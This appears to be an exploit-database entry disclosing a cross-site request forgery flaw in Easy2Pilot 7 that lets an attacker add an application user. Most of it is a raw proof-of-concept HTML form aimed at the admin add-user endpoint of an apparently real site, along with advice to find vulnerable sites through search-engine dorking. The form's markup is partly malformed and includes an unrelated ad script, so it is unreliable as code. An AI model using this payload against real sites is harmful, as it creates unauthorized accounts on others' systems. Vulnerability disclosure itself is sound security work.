header-logo
Suggest Exploit
vendor:
Easy2Pilot 7
by:
indoushka
7.8
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: Easy2Pilot 7
Affected Version From: Easy2Pilot 7
Affected Version To: Easy2Pilot 7
Patch Exists: NO
Related CWE: N/A
CPE: a:easy2pilot:easy2pilot_7
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2020

Easy2Pilot 7 – Cross-Site Request Forgery (Add User)

A Cross-Site Request Forgery (CSRF) vulnerability exists in Easy2Pilot 7, which allows an attacker to add a new user to the application. An attacker can craft a malicious HTML page and send it to the victim, when the victim visits the page, the malicious code will be executed and a new user will be added to the application.

Mitigation:

Implementing a random token in the request and validating it on the server side can help mitigate CSRF attacks.
Source

Exploit-DB raw data:

# Exploit Title: Easy2Pilot 7 - Cross-Site Request Forgery (Add User)
# Author: indoushka
# Date: 2020-02-20
# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)
# Vendor: http://easy2pilot-v7.com/
# CVE: N/A

#poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] save code as poc.html

[+] 

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://www.w3.org/2005/10/profile">
<script data-ad-client="ca-pub-6748326038387042" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
</tr>
                    </table>
                <br/><br/>
        <form action="https://immosl.lu/admin.php?action=add_user" method="POST">
            <table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350">
                <tr>
                    <td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td>
                </tr>
                <tr>
                    <td class="tah11" align="right">Nom d'utilisateur :</td>
                    <td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td>
                </tr>
                <tr>
                    <td class="tah11" align="right">Mot de passe : </td>
                    <td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td>
                </tr>
                <tr>
                    <td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td>
                </tr>
            </table>
        </form><br/><br/>
<div>
	

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================